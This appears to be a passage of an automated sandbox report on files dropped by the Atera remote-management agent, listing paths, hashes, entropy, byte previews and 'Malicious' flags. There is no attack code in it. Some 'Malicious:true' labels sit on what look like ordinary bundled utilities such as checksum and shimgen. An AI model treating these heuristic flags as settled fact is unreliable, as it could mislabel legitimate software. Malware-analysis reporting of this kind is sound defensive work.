                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):331776
                                                                                                                                                                                                                                        Entropy (8bit):6.512244761259412
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:J5lqo52kDzMYDJSi7+Ni2ER9Vh98+1PrEVhkQf0huIDaLOjm:JMqzBDJkk2ERvT8MPAf/O6
                                                                                                                                                                                                                                        MD5:7187AE605F4DCE14BB23EA2623956335
                                                                                                                                                                                                                                        SHA1:F7C1DF33B875C98F41DCDE24117D89D42D25B7CE
                                                                                                                                                                                                                                        SHA-256:9E2631C19B243C28B0980607CED2540E9447B1166572483475547C1A9DD4AC0E
                                                                                                                                                                                                                                        SHA-512:F64522E2FB6BB61884FE53C34E79B355EFB9EC33C02B2CD67D729AF7D763E7B3873A5C7CE6AC7BB4567E6BCF8C70CADBC66F511E8BB151AB05096A832032BC8F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@..|...|...|...p...|...w...|.d.r...|...v...|...x...|.i.#...|...}.|.|.d.!...|...w...|..V....|...v...|.......|. .z...|.Rich..|.........PE..L...`u.a.....................<......<.............@..........................p............@.....................................x.... .......................0...2......................................................(............................text...r........................... ..`.rdata..b...........................@..@.data....'..........................@....sxdata.............................@....rsrc........ ......................@..@.reloc...<...0...>..................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7z.exe.manifest

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):513
                                                                                                                                                                                                                                        Entropy (8bit):4.971000586893018
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:TMHdt43O5GgVNSSN/aN/2UjMNciq2xA5NEG:2dt4+GgBNCNFjMyisD
                                                                                                                                                                                                                                        MD5:8F89387331C12B55EAA26E5188D9E2FF
                                                                                                                                                                                                                                        SHA1:537FDD4F1018CE8D08A3D151AD07B55D96E94DD2
                                                                                                                                                                                                                                        SHA-256:6B7368CE5E38F6E0EE03CA0A9D1A2322CC0AFC07E8DE9DCC94E156853EAE5033
                                                                                                                                                                                                                                        SHA-512:04C10AE52F85D3A27D4B05B3D1427DDC2AFACCFE94ED228F8F6AE4447FD2465D102F2DD95CAF1B617F8C76CB4243716469D1DA3DAC3292854ACD4A63CE0FD239
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="7z" processorArchitecture="*" type="win32" />.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">.. <requestedExecutionLevel level="asInvoker" uiAccess="false" />.. </requestedPrivileges>.. </security>.. </trustInfo>..</assembly>..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7zip.license.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1927
                                                                                                                                                                                                                                        Entropy (8bit):4.78095675693374
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:aCpXZHRo7dL53iEu+byAHsv7g6z0zBZfNP3VyFA:dlq7XTu+xCz0NxxVwA
                                                                                                                                                                                                                                        MD5:899A48828B85C4B0402EE7CF1F65B62B
                                                                                                                                                                                                                                        SHA1:73BA604E5A4E4EA6FB4AD23B8ADF3982B2C82D10
                                                                                                                                                                                                                                        SHA-256:20343526E04CE61EED2675282462E7080D305246F7807386621149C2025765D9
                                                                                                                                                                                                                                        SHA-512:EFD02998961261FFA64332EA13876906D55A8BD8209BF94F922D97889DDF1181129B6A08E5747F1C0A07E69CFC3A05E86D18AFC3E06325B51598F52360881B1B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview: 7-Zip.. ~~~~~.. License for use and distribution.. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.... 7-Zip Copyright (C) 1999-2016 Igor Pavlov..... Licenses for files are:.... 1) 7z.dll: GNU LGPL + unRAR restriction.. 2) All other files: GNU LGPL.... The GNU LGPL + unRAR restriction means that you must follow both .. GNU LGPL rules and unRAR restriction rules....... Note: .. You can use 7-Zip on any computer, including a computer in a commercial .. organization. You don't need to register or pay for 7-Zip....... GNU LGPL information.. --------------------.... This library is free software; you can redistribute it and/or.. modify it under the terms of the GNU Lesser General Public.. License as published by the Free Software Foundation; either.. version 2.1 of the License, or (at your option) any later version..... This library is distributed in the hope that it will be useful,.. but WITHOUT ANY WARRANTY; without even the implied warranty of.. MERCHANTABI

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\checksum.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):29184
                                                                                                                                                                                                                                        Entropy (8bit):5.423222213276874
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:02aUriLtuRZFwdpyTmNSHSBLVogO6QlRSO/:1r0ARZF6NFVogjQlRv/
                                                                                                                                                                                                                                        MD5:5CA71CBFF5A8DE7E5E30B6E94CD42069
                                                                                                                                                                                                                                        SHA1:991701A32492D743430627CBFBD56D6884C32588
                                                                                                                                                                                                                                        SHA-256:23FBD1EE66FCE6872E97B2FE84C409AB30A74FE8720B722BC6F8BAE6E7764C04
                                                                                                                                                                                                                                        SHA-512:77E31EC0DCA4E4895D3A4C0E84C6C1516D94089763F1735CAC150EFCD4EEC36107BB810E24D94C1208B7A80881D858DBFE887B32DA6F6D8F0C48F21C2525D0BE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......X.................f..........n.... ........@.. ....................................@................................. ...K.................................................................................... ............... ..H............text...te... ...f.................. ..`.rsrc................h..............@..@.reloc...............p..............@..B................P.......H.......8<...H......u...........P ......................................h.Mk_F!..D........%..............O...T.....7..u#..[h..T]..^....u.2yC.n........}..?)K.?!@.....3k+.....{.u.@.!q....|....$..f.s!...}.....(".....}....*:.{......o....*2.{....o....*2.{....o....*2.{....o#...*2.{....o$...*..*6.{.....o%...*6.{.....o&...*:.{......o'...*6.{.....o(...*F.{....o)........*F.{....o)........*6.{.....o....*6.{.....o....*6.{.....o....*:.{......o....*6.{.....o....*6.{.....o....*..*"..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\checksum.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):150
                                                                                                                                                                                                                                        Entropy (8bit):4.731888600769331
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:vFWWMNHU8LdgCQcIMOofoObWNRXGws8FLu+gNlFueRObK4QIMOn:TMVBd1IGPKNxgUaNNu5W4QIT
                                                                                                                                                                                                                                        MD5:E9AD5DD7B32C44F8A241DE0E883D7733
                                                                                                                                                                                                                                        SHA1:034C69B120C514AD9ED83C7BAD32624560E4B464
                                                                                                                                                                                                                                        SHA-256:9B250C32CBEC90D2A61CB90055AC825D7A5F9A5923209CFD0625FCA09A908D0A
                                                                                                                                                                                                                                        SHA-512:BF5A6C477DC5DFEB85CA82D2AED72BD72ED990BEDCAF477AF0E8CAD9CDF3CFBEBDDC19FA69A054A65BC1AE55AAF8819ABCD9624A18A03310A20C80C116C99CC4
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <runtime>.. <enforceFIPSPolicy enabled="false"/>.. </runtime>..</configuration>

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\checksum.license.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):95
                                                                                                                                                                                                                                        Entropy (8bit):4.721635609555772
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:SZdFVJMXLreqXy1Wfardzl7BZyOX35++n:Sls/t+WfKj+OXV
                                                                                                                                                                                                                                        MD5:A10B78183254DA1214DD51A5ACE74BC0
                                                                                                                                                                                                                                        SHA1:5C9206F667D319E54DE8C9743A211D0E202F5311
                                                                                                                                                                                                                                        SHA-256:29472B6BE2F4E7134F09CC2FADF088CB87089853B383CA4AF29C19CC8DFC1A62
                                                                                                                                                                                                                                        SHA-512:CAE9F800DA290386DE37BB779909561B4EA4CC5042809E85236D029D9125B3A30F6981BC6B3C80B998F727C48EB322A8AD7F3B5FB36EA3F8C8DD717D4E8BE55E
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:CheckSum is licensed as Apache v2 - https://raw.github.com/ferventcoder/checksum/master/LICENSE

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\shimgen.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):565672
                                                                                                                                                                                                                                        Entropy (8bit):5.0581002983018335
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:hjgGwLGK4Uk0Ycoi6DdP51S2XI5cgGlKFTvr5pgx1v9/oLUmP9nVy:h7wj4kYcopdPm2ac8+1vVmPHy
                                                                                                                                                                                                                                        MD5:F7B6AA803BE23C3192FCC2058D208F44
                                                                                                                                                                                                                                        SHA1:A9569D1A4948FD33D388BB263B5CFF0D66E3BB34
                                                                                                                                                                                                                                        SHA-256:D489923F1F91954B8AA15CD0E763132B9033780481D850D74395F5AB6E266C7C
                                                                                                                                                                                                                                        SHA-512:7FD6E1B291503AC9A67128BAC2D6C8F21B40CE9DE99E015866FC62C79CBBAFCD25F3F43A0EB77A00B20C1D6BE9504E85458D503647BF2CF93BC71DAFB64AF122
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$./b.................x............... ........@.. ....................................@.................................(...W.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc..............................@..B................d.......H.......LX...=......8........@..........................................z.(......}.....(/...o0...}....*..*...0..)........{......E............?...Z...|....................*..}..... .>-.}......}.....*..}......{.... Z...a}......}.....*..}..... ?w*.}......}.....*..}......{.... Z...a}......}.....*..}..... H...}......}.....*..}......{.... ...a}......}.....*..}..... L...}......}.....*..}..... ...F}......}.....*..}.....*.....{....*.s1...z.2.{.....i...*....0..<........{......3..{....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\shimgen.license.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3758
                                                                                                                                                                                                                                        Entropy (8bit):4.882012677800436
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:wwVl/ldfbBaq9k4KM8da2J7LbyM71wKPC/:rVl/ldfsn4KM8daU7LP5wn/
                                                                                                                                                                                                                                        MD5:89AC7C94D1013F7B3E32215A3DB41731
                                                                                                                                                                                                                                        SHA1:1511376E8A74A28D15BB62A75713754E650C8A8D
                                                                                                                                                                                                                                        SHA-256:D4D2EF2C520EC3E4ECFF52C867EBD28E357900E0328BB4173CB46996DED353F4
                                                                                                                                                                                                                                        SHA-512:9BA2B0029E84DE81FFEF19B4B17A6D29EE652049BB3152372F504A06121A944AC1A2B1B57C6B0447979D5DE9A931186FEF9BD0667D5358D3C9CB29B817533792
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:Shim Generator - shimgen.exe..Copyright (C) 2017 - Present Chocolatey Software, Inc ("CHOCOLATEY")..Copyright (C) 2013 - 2017 RealDimensions Software, LLC ("RDS")..===================================================================..Grant of License..===================================================================..ATTENTION: Shim Generator ("shimgen.exe") is a closed source application with..a proprietary license and its use is strictly limited to the terms of this ..license agreement.....RealDimensions Software, LLC ("RDS") grants Chocolatey Software, Inc a revocable, ..non-exclusive license to distribute and use shimgen.exe with the official ..Chocolatey client (https://chocolatey.org). This license file must be stored in ..Chocolatey source next to shimgen.exe and distributed with every copy of ..shimgen.exe. The distribution or use of shimgen.exe outside of these terms ..without the express written permission of RDS is strictly prohibited.....While the source for shimgen.exe is

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller.zip

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1185456
                                                                                                                                                                                                                                        Entropy (8bit):7.999660178690134
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:24576:Ssoja9MaLduouhVlf0tyv29r1+IdjkaCgs54gvUokF4fEFBb:HoFOJuhV+tyor1+I+aqdM2MFBb
                                                                                                                                                                                                                                        MD5:6C6F85E896655A6EB726482F04C49086
                                                                                                                                                                                                                                        SHA1:2E0C55CD4894117428B34D21A1D53738FCE4B02C
                                                                                                                                                                                                                                        SHA-256:E109400A93FEDE90201BBF37C1868C789888BCE9D03A4AE5B46C48599939C34E
                                                                                                                                                                                                                                        SHA-512:B58303C149DEFFC9E374D5BA42A8A73B7CE890D35F9589FE0B09ACEC541A21D589D49FA5086B965277FA22DFE308357505124F13A6FF1E0DE415EBC40CE61E15
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:PK..-.....J9rX...........=...AgentPackageRuntimeInstaller/AgentPackageRuntimeInstaller.exe....0........g.........^ ....,/_.U. *t....H......Z.X..x#...?....(/.EH.....r.l#.6.......76.b....u',4%.Y.br....W..VcO..[b/.....(....."I..u..S*....../.x...j.5.<b......n.v0.. z'M.....w.. ..qu.<...w...[...9....F...D..+....o....!..1I...^=H1.{.:=\...#V.]...1..)F.s":$.g.H.p.'^....K.F...3..}.......[J....xD.........._RB...... \=b.<.u 1k.Y....&.X.).`>M9.$H.].>t..^..!....}_.H.....h....uT.q..cJE.M... .QG..+?.gZM...G.9x.T.q..U..... X.s.....{....F.G$..$.A.n..jz]=.qi!U..4.>.e.7"..].O.F..XdciK..d_0..H..7rHd.jj.L.v6.< ........2.8....8.mc_.(!...\u...mY.........tv.e..,'..E......l..s`... s...W.Sx9b..Dnc...!0_..T.y..%r..{..E;....v"ce.K....{...).B....:N.H$..h..F.......Y.8k.....M....~9..X-M....f>~t..*#..R......6M....f....>-b.....W. .S.WO.c".>.....+iR..w~.u...6../..J..^&...K.BcQ.Fy....<.O.......P..y..#5:l.4.......~........g.:W...1.p7...K...n{.9~..c.h......NT.5...w........?_>XJ..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):55344
                                                                                                                                                                                                                                        Entropy (8bit):6.139210251385105
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:N2Xj3YqBmARWhNqjxcVqnOvdBsqW/BCiFl0scb/MV7Hx/:wX5BqSBjb0tb/MVJ
                                                                                                                                                                                                                                        MD5:77C613FFADF1F4B2F50D31EEEC83AF30
                                                                                                                                                                                                                                        SHA1:76A6BFD488E73630632CC7BD0C9F51D5D0B71B4C
                                                                                                                                                                                                                                        SHA-256:2A0EAD6E9F424CBC26EF8A27C1EED1A3D0E2DF6419E7F5F10AA787377A28D7CF
                                                                                                                                                                                                                                        SHA-512:29C8AE60D195D525650574933BAD59B98CF8438D47F33EDF80BBDF0C79B32D78F0C0FEBE69C9C98C156F52219ECD58D7E5E669AE39D912ABE53638092ED8B6C3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.exe, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.................. ........@.. ....................... ......o7....`.................................X...O.......L...............0(..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...L...........................@..@.reloc..............................@..B........................H........K..|v...........................................................0..........s....(......%.-..( ...+..(!...}\.........s....s......o...+o.....=.r...p(.....(....(.....(....o....r?..p(.....(.......,..o ....*.......4..A.3......4.@t.......0..8.......(!...("...(!...(#...($...(!...o%...($...(!...o&.....&..*........44........('...*..{....*..{....*..{....*..{....*..{....*..('.....}......}.......}.......}......}....*......s....*......s....*......s....*......s....*V.('.....}.....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2010
                                                                                                                                                                                                                                        Entropy (8bit):5.013965898836397
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:3rrb7O7Rgdp+1/gYoSagFsg+w3Sg+Cag+XgjdgDt:7rne4wCNj
                                                                                                                                                                                                                                        MD5:0B17B3BE9B3A6F6879998D280941DE55
                                                                                                                                                                                                                                        SHA1:EDE825B51EE11AF7C9221DCE596BB969CD068529
                                                                                                                                                                                                                                        SHA-256:1D69336E421C535CECF2E0326BE39B44EEC8EA39754AC8E855D8E0368E0F4619
                                                                                                                                                                                                                                        SHA-512:06D9CC03B8F7295A6E02376159EA96A83CAED4B584769370C0BF365B25D29C883BA5C8359CFEB7316D13C93B49FD37CCA267F6E7931220CED71435E1F4B639C8
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>..<startup><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.14.0.17971" newVersion="2.14.0.17971" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <d

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.ini

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):11
                                                                                                                                                                                                                                        Entropy (8bit):3.459431618637298
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WhUnn:Wu
                                                                                                                                                                                                                                        MD5:5EDA46A55C61B07029E7202F8CF1781C
                                                                                                                                                                                                                                        SHA1:862EE76FC1E20A9CC7BC1920309AA67DE42F22D0
                                                                                                                                                                                                                                        SHA-256:12BF7EB46CB4CB90FAE054C798B8FD527F42A5EFC8D7833BB4F68414E2383442
                                                                                                                                                                                                                                        SHA-512:4CF17D20064BE9475E45D5F46B4A3400CDB8180E5E375ECAC8145D18B34C8FCA24432A06AEEC937F5BEDC7C176F4EE29F4978530BE20EDBD7FED38966FE989D6
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:version=1.6

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):93232
                                                                                                                                                                                                                                        Entropy (8bit):6.195903304850222
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:zSvbne0Q41qJ3n8JMW+0KcBLQhZV5M+5Nn0komH7yAfRS7Hx9:zS8UMW+BV5M+5Nn0kom/RS3
                                                                                                                                                                                                                                        MD5:B969BFF44179BF8A3584EEB9E026CAE1
                                                                                                                                                                                                                                        SHA1:DBA7A528F51870B89AED549E81EF0660F43B2943
                                                                                                                                                                                                                                        SHA-256:5EE05D3796AB12ECF7F2D32D48D41D2A2A3FD257AD8456A0EBD5E6019492ECF1
                                                                                                                                                                                                                                        SHA-512:F0643905258D2C09CA0A6C30A0A9AD5AD2FE184A65B7FFA5B7B731FEE8357672B35246626A10B39DF7C18EF1B75328192495685DDF9CD2F524E913D6A2993E18
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c.........." ..0..:..........^X... ...`....... ....................................`..................................X..O....`..8............D..0(...........V............................................... ............... ..H............text...d8... ...:.................. ..`.rsrc...8....`.......<..............@..@.reloc...............B..............@..B................@X......H.......|f..X............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tM...r...p((..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.CommonLib.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):95280
                                                                                                                                                                                                                                        Entropy (8bit):5.998418289121845
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:6iLY8I1pq2jBTn9kbf0KNGVIYMcoS1JkEX5g7HxlF:/Z0PMcjrgF
                                                                                                                                                                                                                                        MD5:3AB0B86F5D058374AC789F05FB6C6E81
                                                                                                                                                                                                                                        SHA1:4C8142A6EA10F48735429B125ADC278178FA0082
                                                                                                                                                                                                                                        SHA-256:5F773968BD0501D91C4AE1339D248B4F766C39885B35088953AFB1BE6FBCC4E8
                                                                                                                                                                                                                                        SHA-512:1A6CC62361FDD20A99D9551E677269D9D67B6F4B66C09083E07AE5732C23FFE15A5E687437A16A27896A19DECEB9F23D7614B6CC44445C365E3A59DED1AEE6E2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..B..........R`... ........... ..............................P.....`.................................._..O....................L..0(..........(_..8............................................ ............... ..H............text...X@... ...B.................. ..`.rsrc................D..............@..@.reloc...............J..............@..B................3`......H........h................................................................(......}......}.......}.......}........o=...}....*..{....*>.{....o.......*v.{....o...........s....(...+*...0..<........{....o.....{....#.......@(....o.....{......o........&.....*........55........{....o.....{....#.......@(....o.....{......o....*..0..$........(......`...%..".o......{.....o....*Z.(....r...po!...o....*..{....o0...r...p.(....(....o&...*6..(....o....*..{....*..{....*.s....z.s....z.s....z.s..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.Exceptions.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16432
                                                                                                                                                                                                                                        Entropy (8bit):6.6559468525212
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:wXh+/DtYchNyby2sE9jBF6IYiYF8pA5K+oCGUHFeFl55qz:wXh+tYmNyb8E9VF6IYinAM+oCaF5qz
                                                                                                                                                                                                                                        MD5:8E2D0F47E477FAE8132492A31B26F1B3
                                                                                                                                                                                                                                        SHA1:6C3EB7CB1D5E942DC6A62767A701D201E2F69CE1
                                                                                                                                                                                                                                        SHA-256:7C8CD3B61286AAC09534541EDBFF10618938236830167581BD3E922CA55A1456
                                                                                                                                                                                                                                        SHA-512:B40EA70361F5AFCCB3DC41D38A4F302AEE00B9AAC206AD2DFBD1591A7722AF732BC820C3C66EA3BC0816D4C98E364D1345077EDC786ED19135659AC91E0CFC06
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
